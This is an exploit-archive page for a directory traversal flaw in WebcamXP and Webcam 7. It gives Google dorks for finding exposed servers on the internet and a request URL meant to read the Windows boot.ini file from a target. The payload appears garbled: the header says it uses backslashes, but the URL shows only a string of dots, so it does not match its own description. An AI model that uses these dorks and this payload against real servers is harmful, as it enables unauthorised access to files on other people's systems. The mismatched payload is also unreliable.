WebcamXP and Webcam 7 Directory Traversal Vulnerability

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : WebcamXP and Webcam 7 Directory Traversal Vulnerability
# Published : 2012-02-22
# Author :
# Previous Title : phxEventManager 2.0 beta 5 search.php search_terms SQL Injection
# Next Title : webgrind 1.0 (file param) Local File Inclusion Vulnerability

# Exploit Title: WebcamXP and Webcam7 Directory Traversal Vulnerability
# Google Dork: "powered by webcamxp" xhtml css
# Google Dork: "powered by webcam 7"
# Date: 2/22/2012
# Author: Silent Dream
# Software Link: http://dl.filekicker.com/send/file/230775-FQAC/wlite550.exe
# Software Link: http://dl.filekicker.com/send/file/226161-G6BD/w7inst.exe
# Version: WebcamXP 5.5.1.2, Webcam 7 v0.9.9.32
# Tested on: Windows XP
# Similar to CVE: 2008-5862 but uses backslashes instead of encoded forward slashes.

http://ip:8080/......................boot.ini